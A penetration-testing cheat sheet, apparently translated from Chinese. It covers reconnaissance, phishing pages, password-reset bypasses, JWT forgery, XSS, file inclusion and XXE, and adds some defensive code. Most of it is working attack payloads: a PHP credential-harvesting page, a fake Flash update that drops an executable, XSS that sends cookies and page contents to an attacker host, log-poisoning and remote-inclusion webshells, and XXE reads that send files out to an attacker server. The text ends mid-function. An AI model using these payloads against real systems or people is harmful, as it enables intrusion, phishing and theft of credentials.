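            for name, rtype in parsed["answers"]:
                records.append((name, rtype))
                if rtype == QTYPE_SOA:
                    soa_seen += 1
    return records


# Constructed responses for offline testing (hand-built, not captured from a server).
_Q = build_query("example.com")[12:]                          # question section: example.com AXFR
_SOA_RDATA = b"\x02ns\xc0\x0c" + b"\x05admin\xc0\x0c" + struct.pack("!IIIII", 1, 2, 3, 4, 5)
SAMPLE_OPEN = (struct.pack("!HHHHHH", 0x1234, 0x8400, 1, 2, 0, 0) + _Q
               + b"\xc0\x0c" + struct.pack("!HHIH", QTYPE_SOA, 1, 60, len(_SOA_RDATA)) + _SOA_RDATA
               + b"\x03www\xc0\x0c" + struct.pack("!HHIH", QTYPE_A, 1, 60, 4) + bytes([10, 0, 0, 1]))
SAMPLE_REFUSED = struct.pack("!HHHHHH", 0x1234, 0x8105, 1, 0, 0, 0) + _Q   # RCODE 5 = REFUSED

if __name__ == "__main__":
    zone, ns = sys.argv[1], sys.argv[2]                      # usage: axfr_check.py example.com ns1.example.com
    rrs = axfr(zone, ns)
    print(f"{zone} @ {ns}: " + ("transfer refused" if rrs is None else f"transfer allowed, {len(rrs)} records"))
```

          Run it once per name server returned by the `nslookup -type=ns` step; a zone that transfers from even one of them hands you every hostname in it, which is why this check sits next to the subdomain enumeration above.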

          Other sites on the same server

          • https://site.ip138.com/
          • Firefox add-on Flagfox, configured so that a single click goes to Bing and looks up the domains that resolve to the same IP

          Sites with the same architecture or source code

          Site JavaScript

          • https://github.com/003random/getJS
          • https://github.com/Threezh1/JSFinder
          • Or press F12 in the browser: the loaded scripts show sensitive information and parameters that may be vulnerable
          • Read the page source: comments often leave behind interfaces that were never removed, pages not linked from the front end, and hints of privilege escalation, injection, JS, etc.
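          What JSFinder and getJS do for a script boils down to two regular expressions. The following is an added example, not their code: SAMPLE_JS is a constructed bundle fragment, BASE_URL is a placeholder host, and the patterns are deliberately tighter than the usual JSFinder-style one so regex literals and bare slashes do not match.

```python
"""Pull endpoints and hard-coded secrets out of JavaScript (added example;
not the JSFinder/getJS code the notes link to). SAMPLE_JS and BASE_URL are
constructed placeholders, not material from any real target."""
from __future__ import annotations

import re
from urllib.parse import urljoin, urlparse

# A quoted string that is an absolute http(s) URL or a root-relative path
# such as "/api/v1/users"; quotes include backticks for template literals.
ENDPOINT_RE = re.compile(
    r"""["'`]((?:https?://[A-Za-z0-9.\-:]+)?/[A-Za-z0-9_\-./?=&%{}]*)["'`]"""
)
# key/secret-looking assignments: apiKey = "...", accessToken: '...', etc.
SECRET_RE = re.compile(
    r"""(?i)\b((?:api|access|secret|auth)?[_-]?(?:key|secret|token))\s*[:=]\s*["']([A-Za-z0-9_\-./+=]{8,})["']"""
)


def extract_endpoints(js: str, base_url: str) -> list[str]:
    """Absolute URLs referenced by the script, de-duplicated and sorted."""
    found = set()
    for m in ENDPOINT_RE.finditer(js):
        ref = m.group(1)
        if ref == "/" or ref.startswith("//"):                # bare root and protocol-relative noise
            continue
        found.add(urljoin(base_url, ref))                     # relative paths resolve against the site
    return sorted(found)


def extract_secrets(js: str) -> list[tuple[str, str]]:
    """(name, value) pairs that look like hard-coded keys or tokens."""
    return [(m.group(1), m.group(2)) for m in SECRET_RE.finditer(js)]


def same_site(urls: list[str], base_url: str) -> list[str]:
    """Keep only endpoints on the base host; third-party hosts belong to the next section."""
    host = urlparse(base_url).netloc
    return [u for u in urls if urlparse(u).netloc == host]


# Constructed sample resembling a bundled front-end script (not a real site).
BASE_URL = "https://target.example"
SAMPLE_JS = r"""
var API = "/api/v1/";
fetch(API + "users?page=1");
axios.post('/api/v1/admin/resetPassword', {uid: 1});
const cdn = "https://cdn.thirdparty.example/lib.js";
const cfg = { apiKey: "AKIAIOSFODNN7EXAMPLE", debug: "/" };
window.accessToken = 'eyJhbGciOiJIUzI1NiJ9.e30.signaturesignature';
"""

if __name__ == "__main__":
    endpoints = extract_endpoints(SAMPLE_JS, BASE_URL)
    for url in same_site(endpoints, BASE_URL):
        print("endpoint:", url)
    for name, value in extract_secrets(SAMPLE_JS):
        print(f"possible secret: {name} = {value[:6]}...")
```

          Point `extract_endpoints` at every script the page loads (the getJS output is a convenient list) and diff the result against what the front end actually links to; the unlinked admin-style paths are the ones worth fuzzing, and anything `extract_secrets` returns should be tried against the matching service before assuming it is dead.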

          Third-party JavaScript used by the site

          Cloud information

          Aliyun, AWS, GCP, Azure and others: look for publicly accessible instances and buckets
          • https://github.com/gwen001/s3-buckets-finder
          • https://github.com/nccgroup/aws-inventory
          • https://github.com/jordanpotti/AWSBucketDump

          App decompilation

          Look for URLs, JS, OSS keys, API endpoints and similar information. For the interfaces you collect: fuzz the common parameters.

          Class C / Class B range information

          Banners; whether the target's admin backends, other entry points or other business systems live in the same ranges

          Tools

          recon-ng, theHarvester, maltego, exiftool, etc.
          • https://www.spiderfoot.net/
          • https://github.com/smicallef/spiderfoot

          Externally open ports

          Masscan, scanport and the like; the usual exploitation methods for the common ports; the commonly unauthenticated services such as Redis, MongoDB, etc.

          Directory scanning / crawling (use with care)

          WAF identification

          https://github.com/EnableSecurity/wafw00f, then plan the bypass strategy before going further.

          Quick casual tests

          A single quote; xx.jpg/.php; admin/123456; universal-password (auth bypass) payloads; the Heartbleed vulnerability

          Search engines

          • Google custom search engine covering 300+ social networking sites: https://cse.google.com/cse?key=AIzaSyB2lwQuNzUsRTH-49FA7od4dB_Xvu5DCvg&cx=001794496531944888666:iyxger-cwug&q=%22%22
          • Google custom search engine covering file-sharing sites: https://cse.google.com/cse/publicurl?key=AIzaSyB2lwQuNzUsRTH-49FA7od4dB_Xvu5DCvg&cx=001794496531944888666:hn5bcrszfhe&q=%22%22
          • LinkedIn user extraction: https://cse.google.com/cse?cx=001394533911082033616:tm5y1wqwmme

          Shodan/fofa/zoomeye

          Google dorks

          site, filetype, intitle, inurl, intext and the other operators

          Information leakage

          • Phone numbers, email addresses, names
          • Directory traversal
          • Backup files (www.zip, xx.com.zip, www.xx.com.zip, wwwroot.zip)
          • .svn / .git / sql / robots / crossdomain.xml / DS_Store and similar
            • https://github.com/lijiejie/ds_store_exp
            • https://github.com/admintony/svnExploit
          • On forums the user with ID=1 is usually the administrator; also read the post details and generate wordlists from them
          • Customer-service QQ numbers on the page (first determine whether it is a corporate or a personal account; sometimes of limited use, depends on how you use it, e.g. as a spear-phishing target)

          Web page caches

          http://www.cachedpages.com/

          Reverse image search

          Baidu image search, Google Images, TinEye; look up the coordinates embedded in original photos

          Social networks

          QQ, Weibo, Alipay, Maimai, LinkedIn, Xianyu, short-video apps, Renren, Tieba, forums. Foreign sites too: some people like to post their daily life on Twitter, Instagram, Facebook and the like.

          Add the phone number to your contacts to match the target's accounts across apps

          Sites the target has registered on

          • https://www.reg007.com/
          • https://www.usersearch.org/

          Interests of the target personnel

          Niche forums and sites the target has registered on; dig into those sites; generate wordlists from the collected usernames, phone numbers and other details.

          Email address collection

          • https://hunter.io/
          • https://github.com/killswitch-GUI/SimplyEmail

          Exchange

          https://github.com/dafthack/MailSniper

          Verifying that an email address exists

          https://tools.verifyemailaddress.io/

          Previously leaked data

          Breach databases:
          • https://haveibeenpwned.com/
          • https://github.com/kernelmachine/haveibeenpwned

          GitHub/Gitee and other code hosting platforms

          • https://github.com/dxa4481/truffleHog
          • https://github.com/lijiejie/GitHack
          • https://github.com/MiSecurity/x-patrol
          • https://github.com/az0ne/Github_Nuggests
          • https://github.com/mazen160/GithubCloner (clone all of a user's GitHub repositories)

          Lists of compromised sites

          http://zone-h.org/archive; WooYun mirrors: look up vulnerabilities previously reported against the target company.

          GPS lookup

          https://www.opengps.cn/Default.aspx

          URL extraction from a site

          http://www.bulkdachecker.com/url-extractor/

          Honeypot detection (for reference only)

          https://honeyscore.shodan.io/

          Default passwords

          • https://default-password.info/
          • http://routerpasswords.com

          If registration is required

          • SMS
            • https://www.materialtools.com/
            • http://receivefreesms.com/
          • Email
            • https://10minutemail.net/
            • https://zh.mytrashmailer.com/
            • http://24mail.chacuo.net/enus
            • https://www.linshiyouxiang.net/
          • Fake identity
            • https://www.fakenamegenerator.com/
            • http://www.haoweichi.com/
            • https://www.fakeaddressgenerator.com/

          Company information

          Tianyancha, Qichacha, the National Enterprise Credit Information Publicity System. Collect corporate email addresses and build a picture of the company: organisational structure, headcount, staff responsibilities, departments, Wi-Fi, passwords commonly used by departments, whether staff have appeared in password leaks, the sites staff usually browse, OA/ERP/CRM/SSO/mail/VPN entry points, network security equipment (WAF, IPS, IDS, routers, etc.), internal code hosting platforms (GitLab, DaoCloud, etc.), bug trackers, and an inventory of servers and domains.

Entry point

Installing Kali on Windows 10 (WSL)

Search for Kali in the Microsoft Store and download it. In PowerShell run:
> Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux
Set the package sources: vim /etc/apt/sources.list
deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
> sudo su
> passwd root                              change the root password
> apt-get update && apt-get upgrade        update
> apt-get dist-upgrade
> apt-get clean
cmd> kali config --default-user root       make root the default user at start-up
cmd> net stop/start LxssManager            restart the service
> apt-get install metasploit-framework
> apt install kali-linux-full              install the full Kali tool set

Watering-hole attacks

XSS clone phishing

Save the site's JS and CSS to your server and point the login form's action at a file that receives the password, action="./pass.php":

<?php
// php
$user = $_POST['username'];
$pass = $_POST['password'];
$file = fopen('pass.txt', 'a+');
fwrite($file, $user . "|" . $pass . "\n");
fclose($file);
echo "<script>window.location.href=\"http://192.168.0.1\"</script>\n";
?>

Build the payload:
<script>window.location.</script>
php -S 0.0.0.0:8080 -t ./

Fake-page phishing

1

https://github.com/r00tSe7en/Fake-flash.cn
Add an XSS-platform module:
window.alert = function(name){
    var iframe = document.createElement("IFRAME");
    iframe.style.display = "none";
    iframe.setAttribute("src", 'data:text/plain');
    document.documentElement.appendChild(iframe);
    window.frames[0].window.alert(name);
    iframe.parentNode.removeChild(iframe);
}
alert("您的FLASH版本過低,嘗試升級后訪問該頁面!");
window.location.;
Build a self-extracting bundle: take one payload .exe and one legitimate .exe, select both, WinRAR -> Add to archive, choose "Create SFX archive", Advanced -> SFX options: set the extraction path to c:\windows\temp\, Setup -> run both exe files after extraction, Modes: hide all, Update: extract and update files, overwrite all files. Change the file icon with ResourceHacker.

2

if(empty($_COOKIE['flash'])){
    echo '<script>alert("你當前計算機的Flash軟件已經很久未更新,將導致無法正常顯示界面內容,請下載安裝最新版本!");window.location="http://www.flash.cn.xx.com/"</script>';
    setcookie("flash","true",time()+30*2400);
}

Attacking exposed services

Web

Front-end / logic flaws

Registration
Arbitrary user registration; username enumeration by brute force; injection; XSS
Login
Brute-force usernames and passwords; injection; "universal" passwords; XSS; XSS + CSRF; modify the response to log in as another user; modify cookie parameters such as user, adminid etc.
Arbitrary password reset
1. Reset an account without requesting a verification code: send the request with the code empty.
2. Request the code and inspect the response.
3. Brute-force the code within its lifetime.
4. Replace the response with the success response.
5. Jump straight to the post-verification page.
6. With two accounts, substitute your own valid code when resetting the other account's password.
7. Substitute your own phone number when resetting someone else's password.
8. After a successful reset of your own account, reset someone else's in the same browser without requesting a code.
9. Swap the identity parameters: username, ID, cookie, token.
10. Change the victim's recovery phone number or e-mail through a privilege-escalation flaw, then reset.
Information leakage
HTML source, JS etc.; see the information-gathering chapter
Admin panel
Change the login parameters to registration ones: /reg, /register, /sign etc.

JWT attack techniques

https://jwt.io/#debugger-io
Signature not verified
Decode the original JWT, change the username or other identity claims, generate a new token and send the request.
Hashing disabled (alg=none)

alg is the signing algorithm. Change the identity claims, set HS256 to none, generate the token and send it, using Python's pyjwt module:

jwt.encode({'user':'admin','arg1':'value1','arg2':'value2'}, algorithm='none', key='')

Brute-forcing weak keys
> pip3 install pyjwt
> python3 crack.py

import jwt
import termcolor

jwt_str = R'token'
with open('/root/password.txt') as f:
    for line in f:
        key_ = line.strip()
        try:
            # PyJWT 2.x requires the algorithm list; older versions used verify=True
            jwt.decode(jwt_str, key=key_, algorithms=['HS256'])
            print('\r', '\bfound key -->', termcolor.colored(key_, 'green'), '<--')
            break
        except (jwt.exceptions.ExpiredSignatureError,
                jwt.exceptions.InvalidAudienceError,
                jwt.exceptions.InvalidIssuedAtError,
                jwt.exceptions.ImmatureSignatureError):
            # the signature was valid but a claim check failed: the key is still right
            print('\r', '\bfound key -->', termcolor.colored(key_, 'green'), '<--')
            break
        except jwt.exceptions.InvalidSignatureError:
            print('\r', ' ' * 64, '\r\btry', key_, end='', flush=True)
            continue
    else:
        print('\r', '\bnot found.')
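The three techniques above (unverified signature, alg=none, weak key) all come down to the verifier trusting the token for decisions the server should make itself. The following is an added example, not code from the original note: a minimal HS256 verifier in pure standard library that pins the algorithm, checks the signature in constant time before reading any claim, and refuses keys shorter than the 256 bits RFC 7518 requires. The sign_hs256 helper, the demo key and the tokens built in demo() are constructed for the demonstration.

```python
# Added example (not from the original note): a minimal HS256 verifier that closes the
# three holes listed above. Standard library only; sign_hs256 exists to build test tokens.
import base64
import hashlib
import hmac
import json
import time

MIN_KEY_BYTES = 32  # RFC 7518 section 3.2: HS256 keys are at least 256 bits; shorter keys are what wordlists find


class InvalidToken(Exception):
    pass


def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(claims: dict, key: bytes) -> str:
    if len(key) < MIN_KEY_BYTES:
        raise ValueError("HS256 key too short")
    header = _b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = _b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url_encode(sig)}"


def verify_hs256(token: str, key: bytes, now=None) -> dict:
    """Return the claims of a valid token, or raise InvalidToken."""
    if len(key) < MIN_KEY_BYTES:
        raise ValueError("HS256 key too short")
    parts = token.split(".")
    if len(parts) != 3:
        raise InvalidToken("token must have three segments")
    head_b64, body_b64, sig_b64 = parts
    try:
        header = json.loads(_b64url_decode(head_b64))
    except (ValueError, UnicodeDecodeError) as exc:
        raise InvalidToken(f"bad header: {exc}")
    # The algorithm is pinned server-side. The header is attacker-controlled, so
    # "alg": "none" (or anything else) is rejected rather than honoured.
    if header.get("alg") != "HS256":
        raise InvalidToken(f"unexpected alg {header.get('alg')!r}")
    expected = hmac.new(key, f"{head_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    # Signature is checked before the body is parsed, with a constant-time compare.
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        raise InvalidToken("signature mismatch")
    claims = json.loads(_b64url_decode(body_b64))
    now = time.time() if now is None else now
    if "exp" in claims and now >= claims["exp"]:
        raise InvalidToken("token expired")
    return claims


def demo() -> dict:
    """Exercise the verifier against a valid token and the manipulations described above."""
    key = b"k" * MIN_KEY_BYTES  # constructed demo key; use os.urandom(32) or longer in practice
    good = sign_hs256({"user": "alice", "exp": 2_000_000_000}, key)
    head_b64, _, sig_b64 = good.split(".")
    forged_body = _b64url_encode(b'{"user":"admin"}')
    none_header = _b64url_encode(b'{"alg":"none","typ":"JWT"}')
    attempts = {
        "tampered_body": f"{head_b64}.{forged_body}.{sig_b64}",  # claims edited, old signature kept
        "alg_none": f"{none_header}.{forged_body}.",               # unsigned token
        "expired": sign_hs256({"user": "alice", "exp": 1}, key),
    }
    results = {"valid": verify_hs256(good, key)["user"]}
    for name, token in attempts.items():
        try:
            verify_hs256(token, key)
            results[name] = "accepted"
        except InvalidToken as exc:
            results[name] = f"rejected: {exc}"
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name:>14}: {outcome}")
```

With a real library the same rules apply: pass an explicit algorithms list to the decode call, never derive it from the token header, and treat the signing key as a secret of at least 32 random bytes so that the wordlist attack above has nothing to find.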

XSS

Steal cookies:
<svg/onload="javascript:document.location.href=('http://xx.xx.xx.xx:7777?cookie='+document.cookie)">
Read the HTML:
<svg/onload="document.location='http://xx.xx.xx.xx:7777/?'+btoa(document.body.innerHTML)">
Read a file:
<svg/onload="xmlhttp=new XMLHttpRequest();xmlhttp.onreadystatechange=function(){if (xmlhttp.readyState==4 && xmlhttp.status==200){document.location='http://xx.xx.xx.xx:7777/?'+btoa(xmlhttp.responseText);}};xmlhttp.open("GET","file.php",true);xmlhttp.send();">
XSS + SSRF to read a server-side file:
<svg/onload="xmlhttp=new XMLHttpRequest();xmlhttp.onreadystatechange=function(){if (xmlhttp.readyState==4 && xmlhttp.status==200){document.location='http://vps_ip:23333/?'+btoa(xmlhttp.responseText);}};xmlhttp.open("POST","request.php",true);xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");xmlhttp.send("url=file:///etc/passwd");">

CSRF

Check whether the request carries identity parameters such as a token, and whether it still succeeds with them removed. Check the Referer and Origin headers, and whether the request still succeeds with them removed. Generate a form with CSRFTester or Burp Suite and test it from another account in another browser. Remove the directory or file after the domain in the Referer; substitute a sub-domain.

Arbitrary file read / download in PHP

File-reading functions such as readfile(), file_get_contents() and fopen() used carelessly: the file path is user-controlled and the content is output.
Download configuration files: Redis, WebLogic, FTP, MySQL, web server configs, history files, database configs.
Download log files.
Download web files:
/1.php?f=../../etc/passwd
/1.php?f=file:///etc/passwd    (file:// bypasses filters on ../)

PHP file inclusion

Functions: include, require, include_once, require_once
Common wrappers
file:// accesses the local file system. The wrapper's working directory is the current directory, so file:///wwwroot/1.php is equivalent to ./wwwroot/1.php, which bypasses some filters.
php:// accesses the various input/output streams (I/O streams).
Read: /1.php?file=php://filter/read=convert.base64-encode/resource=./1.php
Write: /1.php?file=php://filter/write=convert.base64-decode/resource=[file]","base64
Getshell
https://github.com/D35m0nd142/LFISuite
Getshell with allow_url_include on
Remote file inclusion: /1.php?file=http://remote.com/shell.txt
/1.php?file=php://input with POST body <?php phpinfo();?>
or with curl:
> curl -v "http://127.0.0.1:8888/ctf/cli/3.php?file=php://input" -d "<?php phpinfo();?>"
or with the data:// wrapper, which decodes base64 code:
/1.php?file=data://text/plain;base64,PD9waHAgIHBocGluZm8oKTs/Pg==
Getshell with allow_url_include off
Enable a share on the attacking machine: /1.php?file=//attacker/1.php
Or run a WebDAV server, put the shell file in its directory and include it:
> docker run -v /root/webdav:/var/lib/dav -e ANONYMOUS_METHODS=GET,OPTIONS,PROPFIND -e LOCATION=/webdav -p 80:80 --rm --name webdav bytemark/webdav
Put the shell file in /root/webdav/data, then /1.php?file=//attacker/1.php
Getshell by including log files
Fuzz files:
https://github.com/fuzzdb-project/fuzzdb
https://github.com/danielmiessler/SecLists
https://blog.csdn.net/qq_33020901/article/details/78810035
/1.php?file=<?php phpinfo();?>
/1.php?file=../../../../../../../var/log/apache2/access.log
On Windows with phpStudy, request /<?php phpinfo();?> and include the error log:
/1.php?file=C:\phpStudy\Apache\logs\error.log
Upload a webshell in image format and include it directly
/1.php?file=/uploadfile/1.jpg
When the extension is fixed
<?php
$file = $_GET['file'] . ".php";
include($file);
?>
Use the zip wrapper: build a zip archive containing shell.php and rename the archive to png.
Request /1.php?file=zip://shell.png%23shell
The phar wrapper also works: /1.php?file=phar://shell.png/shell
Older versions allow %00 truncation: /etc/passwd%00 (requires magic_quotes_gpc=off; PHP below 5.3.4)
/var/www/%00/etc/passwd/././././././.[…]/./././././. (requires magic_quotes_gpc=off; works on PHP below 5.2.8(?); on Linux the file name must be longer than 4096 characters, on Windows longer than 256)
Dot truncation: /boot.ini/………[…]………… (PHP below 5.2.8(?), Windows only; more than 256 dots)
phpinfo LFI: getshell through temporary files
Exploit the window before the temporary upload file is deleted. Requires an LFI plus a phpinfo page. Writes a one-line webshell named g with password f into /tmp/.
Change the phpinfo file name in the script
LFI file
Run: > python getshell.py 192.168.0.108 80 100    (80 is the port, 100 the thread count)

http://192.168.0.110/index.php?file=../../../tmp/g&f=echo%20%271%27
session + LFI getshell
When session.upload_progress.enabled is on, a file upload creates a progress file: /var/lib/php5/sess_ or /var/lib/php/sess_
LFI via the SSH log
> ssh '<?php system($_GET['c']); ?>'@192.168.0.107
> http://192.168.0.107/lfi.php?file=/var/log/auth.log&c=ls
RFI and command injection to an MSF session
Generate with MSF:
# use exploit/multi/script/web_delivery
# set target PHP
Command-injection point: php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.0.107:1234/OgsOFaj3yKH'));"
RFI: http://www.xx.com/file=http://192.168.0.107:1234/OgsOFaj3yKH
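Every variant in the two sections above (../ traversal, absolute paths, the file://, php://, zip:// and phar:// wrappers, %00 truncation, including a .jpg or a log file) gets through because the application joins user input onto a path and hands the result to the file system. The following is an added example, not code from the original note, showing how a download or template endpoint can resolve a user-supplied name so that all of those fail closed: canonicalise, require the result to stay under the base directory, and allowlist the suffix. Standard library only; the directory tree and request strings in demo() are constructed for the demonstration.

```python
# Added example (not from the original note): resolving a user-supplied file name for a
# download or include endpoint so the traversal, wrapper and NUL-byte tricks above fail closed.
# Standard library only; the directory layout in demo() is constructed for the demonstration.
from pathlib import Path
import tempfile

ALLOWED_SUFFIXES = {".txt", ".pdf", ".png"}  # allowlist; never ".php", ".log", ".ini" and the like


class PathRejected(Exception):
    pass


def resolve_download(base_dir, user_path: str) -> Path:
    """Map user_path onto a real file under base_dir or raise PathRejected."""
    if "\x00" in user_path:
        raise PathRejected("NUL byte in path")  # the %00 truncation trick
    if "://" in user_path or user_path.startswith(("//", "\\\\")):
        raise PathRejected("URL wrappers (file://, php://, zip://, phar://, data://) and UNC paths are not allowed")
    base = Path(base_dir).resolve()
    # Joining an absolute user path discards base; resolve() collapses ../ and follows symlinks,
    # so the containment check below sees the real target.
    candidate = (base / user_path).resolve()
    try:
        candidate.relative_to(base)
    except ValueError:
        raise PathRejected(f"{user_path!r} escapes {base}")
    if candidate.suffix.lower() not in ALLOWED_SUFFIXES:
        raise PathRejected(f"suffix {candidate.suffix!r} not allowed")
    if not candidate.is_file():
        raise PathRejected("not a regular file")
    return candidate


def demo() -> dict:
    """Run the resolver over request strings from this section against a constructed tree."""
    root = Path(tempfile.mkdtemp()).resolve()
    (root / "docs").mkdir()
    (root / "docs" / "report.txt").write_text("quarterly report")
    (root / "config.php").write_text("<?php $db_pass = 'x'; ?>")
    requests = [
        "docs/report.txt",                   # legitimate
        "../../etc/passwd",                  # traversal
        "/etc/passwd",                       # absolute path
        "file:///etc/passwd",                # wrapper
        "php://filter/resource=config.php",  # wrapper
        "docs/../config.php",                # inside base but disallowed suffix
        "docs/report.txt\x00.php",           # NUL truncation
    ]
    results = {}
    for req in requests:
        try:
            results[req] = str(resolve_download(root, req).relative_to(root))
        except PathRejected as exc:
            results[req] = f"rejected: {exc}"
    return results


if __name__ == "__main__":
    for req, outcome in demo().items():
        print(f"{req!r:40} -> {outcome}")
```

For include() specifically the stronger fix is not to build the path from input at all: map a request parameter onto a fixed dictionary of template names and include only those, and keep allow_url_include off so the http://, php://input and data:// cases above are unreachable regardless.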

XML

XML is designed to transport data, not to display it. XXE = XML External Entity injection; XML = eXtensible Markup Language.
XML declaration: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
A DTD is the document type definition for the XML. Including an external DTD: <!DOCTYPE root-element SYSTEM "filename">
Parameter entity plus external entity:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [
    <!ENTITY % file SYSTEM "file:///etc/passwd">
    %file;
]>
XML injection
Close the tags and rewrite the XML document where user input is concatenated into it:
<?xml version="1.0" encoding="utf-8"?>
<manager>
    <admin><username>admin</username><password>admin</password></admin>
    <admin><username>root</username><password>root</password></admin>
</manager>
If password is user-controlled, the concatenation becomes an injection:
admin</password></admin><admin><name>hack</name><password>hacker</password></admin>
XXE
https://github.com/AonCyberLabs/xxe-recursive-download
When a program parses XML input without disabling external entity loading, the result can be arbitrary file reads, command execution, internal port scanning, attacks on internal websites, DoS and so on.
Detection
Echoed path:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "test">%remote;]>
DNSLOG (http://www.dnslog.cn/):
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY dtd SYSTEM "http://xxx.dnslog.cn/xxe">]><xxe>&dtd;</xxe>
WebDAV: where WebDAV is enabled, the PROPPATCH, PROPFIND and LOCK methods accept XML input and can carry XXE.
WSDL: test with AWVS.
Discovery
Wherever XML is exchanged, send
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE ANY [ <!ENTITY test "this is test">]><root>&test;</root>
and check whether the value is output. Check whether external entities are supported:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [
    <!ENTITY % foo SYSTEM "http://attacker/evil.xml">
    %foo;
]>
and see whether your server receives a request.
JSON content-type XXE: change the headers to Content-Type: application/xml and X-Requested-With: XMLHttpRequest:
<?xml version="1.0" encoding="UTF-8" ?><!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><root><參數name>name</參數name><參數value>&xxe;</參數value></root>
Reading local files with output
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE creds [ <!ENTITY goodies SYSTEM "file:////etc/passwd"> ]><creds>&goodies;</creds>
Dropping the file name lists the directory: file:///root/.sh/id_rsa
Special characters:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag [
    <!ENTITY % start "<![CDATA[">
    <!ENTITY % goodies SYSTEM "file:////tmp/xxx.txt">
    <!ENTITY % end "]]>">
    <!ENTITY % dtd SYSTEM "http://attacker/evil.dtd">
    %dtd;
]>
<roottag>&all;</roottag>
evil.dtd:
<?xml version="1.0" encoding="UTF-8"?><!ENTITY all "%start;%goodies;%end;">
Blind OOB XXE (no output)
Requires parameter entities referencing an external DTD. Payload:
<!DOCTYPE convert [<!ENTITY % remote SYSTEM "http://ip/test.dtd">%remote;%int;%send;]>
test.dtd:
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://attacker:9999?p=%file;'>">
Directory listing
Remote payload:
<!ENTITY % a SYSTEM "file:///"> <!ENTITY % b "<!ENTITY &#37; c SYSTEM 'gopher://ip:80/%a;'>"> %b; %c;
Injected payload:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://attacker:80/1.xml">%remote;]><root/>
Protocols supported by different platforms
Command execution
In a PHP environment with the expect extension installed, system commands can be executed; other wrappers may also allow it.
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "expect://id" >]><root><name>&xxe;</name></root>
Internal host discovery
First read /etc/network/interfaces, /proc/net/arp, /etc/hosts and similar files to find the IP ranges, then use a script.
Internal port scanning
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE data SYSTEM "http://127.0.0.1:515/" [ <!ELEMENT data (#PCDATA)> ]><data>4</data>
Iterate the port with Burp Suite's Intruder.
Exploiting local DTDs
Linux
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamsa 'Your DTD code'>
%local_dtd;
Windows
<!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd">
<!ENTITY % SuperClass '>Your DTD code<!ENTITY test "test"'>
%local_dtd;
<?xml version="1.0" ?>
<!DOCTYPE message [
    <!ENTITY % local_dtd SYSTEM "file:///opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd">
    <!ENTITY % condition 'aaa)>
        <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
        &#x25;eval;
        &#x25;error;
        <!ELEMENT aa (bb'>
    %local_dtd;
]>
<message>any text</message>
Writing a shell through XXE
When the XML processor supports XSL:
<?xml version='1.0'?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user="http://mycompany.com/mynamespace">
<msxsl:script language="C#" implements-prefix="user"><![CDATA[
public string xml(){
    System.Net.WebClient webClient = new System.Net.WebClient();
    webClient.DownloadFile("https://x.x.x.x/shell.txt", @"c:\inetpub\wwwroot\shell.aspx");
    return "Exploit Success";
}
]]></msxsl:script>
<xsl:template match="/"><xsl:value-of select="user:xml()"/></xsl:template>
</xsl:stylesheet>
```
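Both problems in this section have a parser-side fix: XXE in all its forms (echoed, blind OOB, directory listing, port scan, local-DTD tricks) needs the DOCTYPE and entity machinery, and XML injection needs user input to reach the document unescaped. The following is an added example, not code from the original note, showing a strict parser built on the standard-library expat binding that refuses any DOCTYPE, entity declaration or external entity reference, and an escaping builder for the <admin> record used in the injection example. The sample documents, including the XXE and OOB payloads, are constructed for the demonstration.

```python
# Added example (not from the original note): parsing XML with the DTD and entity machinery
# the payloads above rely on switched off, plus escaping when user input is concatenated into
# XML. Standard library only; the sample documents are constructed.
import xml.parsers.expat as expat
from xml.sax.saxutils import escape


class UnsafeXML(Exception):
    pass


def parse_strict(data: bytes) -> list:
    """Return [(tag, text), ...] in end-tag order; raise UnsafeXML on any DTD, entity or malformed input."""
    parser = expat.ParserCreate()
    parser.buffer_text = True

    def forbid_doctype(name, sysid, pubid, has_internal_subset):
        # Refusing the DOCTYPE blocks internal/external entities, parameter entities and OOB DTD loads.
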